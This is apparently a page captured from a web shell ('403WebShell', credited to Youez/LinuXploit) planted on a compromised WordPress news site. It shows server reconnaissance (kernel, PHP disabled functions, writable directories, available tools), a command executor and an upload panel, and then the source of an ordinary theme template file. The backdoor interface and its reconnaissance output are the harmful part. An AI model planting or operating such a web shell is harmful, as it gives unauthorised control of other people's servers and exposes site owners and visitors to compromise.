AVRIL_START_JANCOKALIVEAVRIL_END_JANCOK Interactive Terminal

Command Executor

403WebShell
403Webshell
Server IP : dzynews.com  /  Your IP : 216.73.217.105
Web Server : nginx/1.30.3
System : Linux cloud-tdkldl-avd6 5.15.0-91-generic #101-Ubuntu SMP Tue Nov 14 13:30:08 UTC 2023 x86_64
User : www ( 1000)
PHP Version : 8.2.31
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/dzynews.com/wp-content/themes/archive-document/TempParts/stream/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/dzynews.com/wp-content/themes/archive-document/TempParts/stream/document.php
<?php
/**
 * 文档
 */
$post_id = get_the_id();
?>
<?php do_action('b2_stream_document_before'); ?>

<header class="item-header">
    <div class="s-a-h">
        <div class="sah-l">
            <span class="sah-date" v-html="item.data.meta.date"></span>
        </div>
        <div class="sah-r">
            <div class="sah-type"><span v-text="item.data.terms.post_type.name"></span></div>
            <div class="sah-catlist">
                <span v-for="cat in item.data.terms.terms">
                    <a :href="cat.link" v-text="cat.name" target="_blank"></a>
                </span>
            </div>
        </div>
    </div>
</header>
<div class="s-a-c">
    <div class="s-a-c-l">
        <h2><a :href="item.title.link" target="_blank" class="b2-out" v-html="item.title.name"><?php echo get_the_title(); ?></a></h2>
        <div :class="'item-content '+ (item.images.length > 0 ? 'col' : '')">
            <a :href="item.title.link" target="_blank" class="link-block"></a>
            <div class="b2-out" v-html="item.desc" v-if="item.desc"><?php echo b2_get_excerpt($post_id,120); ?></div>
            <div class="item-content-bottom" v-if="item.images.length > 0">
                <div v-for="img in item.images">
                    <?php echo b2_get_img(array(
                        'src_data'=>':src="img.thumb"',
                        'class'=>array('b2-radius'),
                        'source_data'=>':srcset="img.thumb_webp"'
                    ));?>
                </div>
            </div>
            <div class="item-content-right" v-else-if="item.thumb">
                <?php echo b2_get_img(array(
                    'src_data'=>':src="item.thumb"',
                    'class'=>array('b2-radius'),
                    'source_data'=>':srcset="item.thumb_webp"'
                ));?>
            </div>
        </div>
    </div>
</div>
<div class="s-a-f">
    <div class="saf-z">
        <button :class="item.data.data.up_isset == 1 ? 'picked' : ''" @click="vote('up',item.id,index)"><?php echo b2_get_icon('b2-arrow-drop-up-fill').' '.__('赞','b2'); ?><b v-text="item.data.data.up"></b></button>
        <button :class="item.data.data.down_isset == 1 ? 'picked' : ''" @click="vote('down',item.id,index)"><?php echo b2_get_icon('b2-arrow-drop-down-fill'); ?></button>
    </div>
    <div class="saf-c">
        <span class="saf-comment"><a :href="item.title.link" target="_blank"><?php echo b2_get_icon('b2-chat-smile-2-line'); ?><b v-if="item.data.meta.comment == 0"><?php echo __('参与讨论','b2'); ?></b><b v-else>{{item.data.meta.comment}}<?php echo __('条讨论','b2'); ?></b></a></span>
    </div>
</div>
<?php do_action('b2_stream_document_after'); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit